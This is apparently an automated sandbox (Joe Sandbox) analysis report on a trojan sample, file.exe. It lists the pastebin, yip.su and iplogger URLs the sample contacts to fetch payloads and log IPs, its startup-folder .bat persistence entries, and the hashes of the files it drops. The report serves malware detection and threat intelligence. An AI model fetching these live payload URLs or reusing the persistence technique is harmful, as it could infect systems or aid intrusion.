                            https://yip.su/redirect-InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000003.00000002.3538302079.00000000031B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://pastebin.comInstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4file.exe, 00000000.00000002.2630838739.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630838739.000000000306C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3535416416.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.cloudflare.com/5xx-error-landingInstallUtil.exe, 00000003.00000002.3538302079.00000000032F9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003325000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003338000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003348000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031ED000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://iplogger.org/privacy/InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            172.67.19.24
                            		pastebin.comUnited States
                            		13335CLOUDFLARENETUStrue
                            188.114.96.3
                            		yip.suEuropean Union
                            		13335CLOUDFLARENETUSfalse
                            172.67.188.178
                            		iplogger.comUnited States
                            		13335CLOUDFLARENETUSfalse

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1490825
                            Start date and time:2024-08-09 22:59:09 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 21s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:24
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winEXE@28/8@3/3
                            EGA Information:
                            • Successful, ratio: 50%
                            HCA Information:
                            • Successful, ratio: 95%
                            • Number of executed functions: 124
                            • Number of non-executed functions: 30
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target InstallUtil.exe, PID 4876 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            17:00:51API Interceptor1x Sleep call for process: file.exe modified
                            17:00:52API Interceptor596828x Sleep call for process: InstallUtil.exe modified
                            23:00:54AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat
                            23:01:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.bat
                            23:01:16AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uknphp3q7QNTU5S7JDQd395T.bat
                            23:01:29AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7jqZT4DOBm3RwAn2PcA575yH.bat
                            23:01:37AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aQqevjV3RV9JJaF7h5x7Exf9.bat
                            23:01:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pltF0lsLekfh4Kak6kjaROUd.bat
                            23:01:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aZULhs3yjKzrM4jdcsdY0pG.bat
                            23:02:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bPdKjWiyihutETqOInbK2Mh7.bat
                            23:02:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\r0jZki8LXw6VDzrX91cyCdNu.bat
                            23:02:23AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RLZSJnuvQOF9NbwJnvwyhUvy.bat

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            172.67.19.24sostener.vbsGet hashmaliciousRemcosBrowse
                            • pastebin.com/raw/V9y5Q5vv
                            Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            188.114.96.3Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exeGet hashmaliciousFormBookBrowse
                            • www.jnhdh8827.com/pz12/?uTm4D=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHXHyD6os1JO7aTrmdA==&tX9tN=1bMtYrqh7B54XFQP
                            z4Nuevalistaadjunta.exeGet hashmaliciousDBatLoader, FormBookBrowse
                            • www.coinwab.com/kqqj/
                            ACCEPT_014STSY529093.PDF.exeGet hashmaliciousAzorultBrowse
                            • l0h5.shop/CM341/index.php
                            Ticari Siparis Belgesi 07 08 2024 18545075600_pdf.exeGet hashmaliciousFormBookBrowse
                            • www.jnhdh8827.com/pz12/?Fvt=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHXLLcLIs9Jvq&3fMpsD=BfiHV2ph_4
                            Payment advice.exeGet hashmaliciousFormBookBrowse
                            • www.aggame.asia/0dmj/
                            709282738372873.exeGet hashmaliciousFormBookBrowse
                            • www.coinwab.com/kqqj/
                            Document 240000807.exeGet hashmaliciousFormBookBrowse
                            • www.lampgm.pro/em9t/
                            http://cs2024-cs.fdabv.com/Get hashmaliciousUnknownBrowse
                            • cs2024-cs.fdabv.com/
                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                            • filetransfer.io/data-package/HPg28kQA/download
                            QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                            • filetransfer.io/data-package/7wFhpez4/download
                            172.67.188.178SecuriteInfo.com.Win32.TrojanX-gen.2935.18945.exeGet hashmaliciousAmadey, DarkTortilla, RedLine, XWormBrowse
                              yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                                  SecuriteInfo.com.BackDoor.SpyBotNET.62.21177.12908.exeGet hashmaliciousEICAR, PureLog Stealer, zgRATBrowse
                                    3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                      3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                        1cEhV3HjIY.exeGet hashmaliciousUnknownBrowse
                                          SecuriteInfo.com.Win64.DropperX-gen.29167.15583.exeGet hashmaliciousPureLog StealerBrowse
                                            2.exeGet hashmaliciousSmokeLoaderBrowse
                                              bS6MkUwj0r.exeGet hashmaliciousPureLog Stealer, zgRATBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                yip.sufile.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                                                • 188.114.97.3
                                                SecuriteInfo.com.Trojan.Inject5.6732.13710.8794.exeGet hashmaliciousCryptbot, NeoreklamiBrowse
                                                • 188.114.97.3
                                                yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                • 188.114.97.3
                                                8998BC9FAF52DAB072698E932593819BFD772EE5C0C4519F30ECD55DE363505A.exeGet hashmaliciousBdaejecBrowse
                                                • 188.114.96.3
                                                file.exeGet hashmaliciousAmadey, GluptebaBrowse
                                                • 104.21.79.77
                                                file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                • 104.21.79.77
                                                LIRR4A0xzv.exeGet hashmaliciousAmadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                • 172.67.169.89
                                                dl7WL77rkA.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                                • 172.67.169.89
                                                sTsbAmON9u.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                • 172.67.169.89
                                                amONbBvdCh.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                • 172.67.169.89
                                                pastebin.comfile.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                                                • 104.20.3.235
                                                SecuriteInfo.com.Trojan.Siggen29.14708.13579.16480.exeGet hashmaliciousStormKitty, XWormBrowse
                                                • 104.20.3.235
                                                SecuriteInfo.com.Trojan.Inject5.6732.13710.8794.exeGet hashmaliciousCryptbot, NeoreklamiBrowse
                                                • 104.20.3.235
                                                BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                • 104.20.3.235
                                                CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                • 104.20.4.235
                                                XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                • 104.20.4.235
                                                lp2wZPvBsS.exeGet hashmaliciousDCRatBrowse
                                                • 104.20.4.235
                                                Hash Cracking v1.0.exeGet hashmaliciousRedLineBrowse
                                                • 104.20.4.235
                                                yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                • 172.67.19.24
                                                ShadowCrypter.exeGet hashmaliciousClipboard Hijacker, XWormBrowse
                                                • 104.20.3.235
                                                iplogger.comyLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                • 172.67.188.178
                                                Arc453466701.msiGet hashmaliciousUnknownBrowse
                                                • 104.21.76.57
                                                Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                                                • 104.21.76.57
                                                Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                                                • 104.21.76.57
                                                Arch0000000000.msiGet hashmaliciousMetamorfoBrowse
                                                • 104.21.76.57
                                                3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.188.178
                                                3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                                • 104.21.76.57
                                                setup.exeGet hashmaliciousUnknownBrowse
                                                • 104.21.76.57
                                                YCImxTWoQs.exeGet hashmaliciousRedLineBrowse
                                                • 104.21.76.57
                                                w5ks798nGQ.exeGet hashmaliciousRedLineBrowse
                                                • 172.67.188.178

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUSaccounting@cougar-contractors.com.htmGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                • 104.17.25.14
                                                http://theweber.groupGet hashmaliciousHTMLPhisherBrowse
                                                • 172.64.151.101
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 104.30.145.62
                                                file.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                                                • 188.114.96.3
                                                [EXTERNAL] Complete with AdobeSignPDF_ Approve and Sign TRCOT.emlGet hashmaliciousUnknownBrowse
                                                • 104.18.95.41
                                                https://PoCloudCentral.crm.PowerObjects.net/PowerEmailWebsite//GetUrl2013.aspx?t=y3vuZubUq0iF06ZJWk4mdHUAbgBxADYANgBlAGUANwBiAGMAYgBkADQAZQA2ADQAOABhAGIAOAA1AGQAMwBhADYANAA5ADUAYQA0AGUAMgA%3D&eId=e3af09cd-5756-ef11-a317-002248046aa4&pval=https%3A%2F%2Fportal.apic.org%2Fs%2F%3Futm_campaign%3DCICcertprep_User_Upsell_Online_Extension%26utm_medium%3Dwebad%26utm_source%3DCIC_LS%26utm_content%3DExtendAccessNow%252F%23%2Fstore%2Fbrowse%2Fdetail%2Fa1BUd000004g98SMAQGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                SecuriteInfo.com.Win64.Evo-gen.27204.8168.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                https://t.co/NtdYAywq5HGet hashmaliciousHTMLPhisherBrowse
                                                • 104.16.123.96
                                                https://accountservicing.com/e3t/Ctc/2H+113/ccl-Y04/VVqYcj9d1pTLW16y89n4DRlWxW1xTZ7Q5jxmFNN5BW0Sj3qgyTW7Y8-PT6lZ3n-W7K16HT7thx4hV6kpN06fVkc-W7yxLrN95hXZjW4rblJ-6TSnSZW65gGqH4W43v4N3_YsqT-3YKYVxfV2W58G73YW3cFwVC8ny83jW8Fz12N8-V0SmW5SSzp43rM_L2W245fnt8p94jMW4PPrDY6Cb9HjW2Zf9wL3lKcTbW61Hhz233pYyDW5Qh4rN5z3QrwW1QwY5K38F8JxW433Jj716pqBlW5WlHSd1QR2ZcVsdP_h6JX3RcW6YQskh3NNSGKW9hbgq820G9QVW4RCZ8N3hkwKQW6Ykd0p7cQ_DrW48gHN96lLqMFW4402zd4Vsz0kW8KJCq78P_VX-f5RrgHM04Get hashmaliciousUnknownBrowse
                                                • 104.16.117.116
                                                MDI-Emissions-Estimator-2024.xlsGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                CLOUDFLARENETUSaccounting@cougar-contractors.com.htmGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                • 104.17.25.14
                                                http://theweber.groupGet hashmaliciousHTMLPhisherBrowse
                                                • 172.64.151.101
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 104.30.145.62
                                                file.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                                                • 188.114.96.3
                                                [EXTERNAL] Complete with AdobeSignPDF_ Approve and Sign TRCOT.emlGet hashmaliciousUnknownBrowse
                                                • 104.18.95.41
                                                https://PoCloudCentral.crm.PowerObjects.net/PowerEmailWebsite//GetUrl2013.aspx?t=y3vuZubUq0iF06ZJWk4mdHUAbgBxADYANgBlAGUANwBiAGMAYgBkADQAZQA2ADQAOABhAGIAOAA1AGQAMwBhADYANAA5ADUAYQA0AGUAMgA%3D&eId=e3af09cd-5756-ef11-a317-002248046aa4&pval=https%3A%2F%2Fportal.apic.org%2Fs%2F%3Futm_campaign%3DCICcertprep_User_Upsell_Online_Extension%26utm_medium%3Dwebad%26utm_source%3DCIC_LS%26utm_content%3DExtendAccessNow%252F%23%2Fstore%2Fbrowse%2Fdetail%2Fa1BUd000004g98SMAQGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                SecuriteInfo.com.Win64.Evo-gen.27204.8168.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                https://t.co/NtdYAywq5HGet hashmaliciousHTMLPhisherBrowse
                                                • 104.16.123.96
                                                https://accountservicing.com/e3t/Ctc/2H+113/ccl-Y04/VVqYcj9d1pTLW16y89n4DRlWxW1xTZ7Q5jxmFNN5BW0Sj3qgyTW7Y8-PT6lZ3n-W7K16HT7thx4hV6kpN06fVkc-W7yxLrN95hXZjW4rblJ-6TSnSZW65gGqH4W43v4N3_YsqT-3YKYVxfV2W58G73YW3cFwVC8ny83jW8Fz12N8-V0SmW5SSzp43rM_L2W245fnt8p94jMW4PPrDY6Cb9HjW2Zf9wL3lKcTbW61Hhz233pYyDW5Qh4rN5z3QrwW1QwY5K38F8JxW433Jj716pqBlW5WlHSd1QR2ZcVsdP_h6JX3RcW6YQskh3NNSGKW9hbgq820G9QVW4RCZ8N3hkwKQW6Ykd0p7cQ_DrW48gHN96lLqMFW4402zd4Vsz0kW8KJCq78P_VX-f5RrgHM04Get hashmaliciousUnknownBrowse
                                                • 104.16.117.116
                                                MDI-Emissions-Estimator-2024.xlsGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                CLOUDFLARENETUSaccounting@cougar-contractors.com.htmGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                • 104.17.25.14
                                                http://theweber.groupGet hashmaliciousHTMLPhisherBrowse
                                                • 172.64.151.101
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 104.30.145.62
                                                file.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                                                • 188.114.96.3
                                                [EXTERNAL] Complete with AdobeSignPDF_ Approve and Sign TRCOT.emlGet hashmaliciousUnknownBrowse
                                                • 104.18.95.41
                                                https://PoCloudCentral.crm.PowerObjects.net/PowerEmailWebsite//GetUrl2013.aspx?t=y3vuZubUq0iF06ZJWk4mdHUAbgBxADYANgBlAGUANwBiAGMAYgBkADQAZQA2ADQAOABhAGIAOAA1AGQAMwBhADYANAA5ADUAYQA0AGUAMgA%3D&eId=e3af09cd-5756-ef11-a317-002248046aa4&pval=https%3A%2F%2Fportal.apic.org%2Fs%2F%3Futm_campaign%3DCICcertprep_User_Upsell_Online_Extension%26utm_medium%3Dwebad%26utm_source%3DCIC_LS%26utm_content%3DExtendAccessNow%252F%23%2Fstore%2Fbrowse%2Fdetail%2Fa1BUd000004g98SMAQGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                SecuriteInfo.com.Win64.Evo-gen.27204.8168.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                https://t.co/NtdYAywq5HGet hashmaliciousHTMLPhisherBrowse
                                                • 104.16.123.96
                                                https://accountservicing.com/e3t/Ctc/2H+113/ccl-Y04/VVqYcj9d1pTLW16y89n4DRlWxW1xTZ7Q5jxmFNN5BW0Sj3qgyTW7Y8-PT6lZ3n-W7K16HT7thx4hV6kpN06fVkc-W7yxLrN95hXZjW4rblJ-6TSnSZW65gGqH4W43v4N3_YsqT-3YKYVxfV2W58G73YW3cFwVC8ny83jW8Fz12N8-V0SmW5SSzp43rM_L2W245fnt8p94jMW4PPrDY6Cb9HjW2Zf9wL3lKcTbW61Hhz233pYyDW5Qh4rN5z3QrwW1QwY5K38F8JxW433Jj716pqBlW5WlHSd1QR2ZcVsdP_h6JX3RcW6YQskh3NNSGKW9hbgq820G9QVW4RCZ8N3hkwKQW6Ykd0p7cQ_DrW48gHN96lLqMFW4402zd4Vsz0kW8KJCq78P_VX-f5RrgHM04Get hashmaliciousUnknownBrowse
                                                • 104.16.117.116
                                                MDI-Emissions-Estimator-2024.xlsGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                                                • 172.67.19.24
                                                • 172.67.188.178
                                                • 188.114.96.3
                                                SecuriteInfo.com.Win64.Evo-gen.27204.8168.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.19.24
                                                • 172.67.188.178
                                                • 188.114.96.3
                                                SecuriteInfo.com.Win32.PWSX-gen.8266.31032.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.19.24
                                                • 172.67.188.178
                                                • 188.114.96.3
                                                SecuriteInfo.com.Win32.DropperX-gen.709.18225.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                • 172.67.19.24
                                                • 172.67.188.178
                                                • 188.114.96.3
                                                SecuriteInfo.com.Trojan.DownLoader47.7362.16444.30811.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.19.24
                                                • 172.67.188.178
                                                • 188.114.96.3
                                                SecuriteInfo.com.Trojan.Siggen29.14708.13579.16480.exeGet hashmaliciousStormKitty, XWormBrowse
                                                • 172.67.19.24
                                                • 172.67.188.178
                                                • 188.114.96.3
                                                SecuriteInfo.com.Trojan.TR.Dropper.Gen.31130.17125.exeGet hashmaliciousQuasarBrowse
                                                • 172.67.19.24
                                                • 172.67.188.178
                                                • 188.114.96.3
                                                SecuriteInfo.com.Win32.PWSX-gen.25135.17011.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.19.24
                                                • 172.67.188.178
                                                • 188.114.96.3
                                                SecuriteInfo.com.Trojan.DownLoader47.7362.16444.30811.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.19.24
                                                • 172.67.188.178
                                                • 188.114.96.3
                                                SecuriteInfo.com.Win32.DropperX-gen.11831.8378.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                • 172.67.19.24
                                                • 172.67.188.178
                                                • 188.114.96.3

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\file.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
                                                MD5:7B709BC412BEC5C3CFD861C041DAD408
                                                SHA1:532EA6BB3018AE3B51E7A5788F614A6C49252BCF
                                                SHA-256:733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
                                                SHA-512:B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
                                                Malicious:true
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                C:\Users\user\AppData\Local\lHi4knFRqmK4FFdSjJjLFDSD.exe

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                Category:dropped
                                                Size (bytes):7462
                                                Entropy (8bit):5.420482116403958
                                                Encrypted:false
                                                SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                                                MD5:77F762F953163D7639DFF697104E1470
                                                SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                                                SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                                                SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                                                Malicious:false
                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                                                C:\Users\user\AppData\Local\ya3fW80pEvNY3Pp8eIbfmN8e.exe

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                Category:dropped
                                                Size (bytes):7462
                                                Entropy (8bit):5.420482116403958
                                                Encrypted:false
                                                SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                                                MD5:77F762F953163D7639DFF697104E1470
                                                SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                                                SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                                                SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                                                Malicious:false
                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.bat

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):72
                                                Entropy (8bit):4.86924805016808
                                                Encrypted:false
                                                SSDEEP:3:Ljn9m1N+E2J5JtbX3EczbiF:fE1N723jbEcXm
                                                MD5:F0CADC91C7B3B58616C49687D377FD10
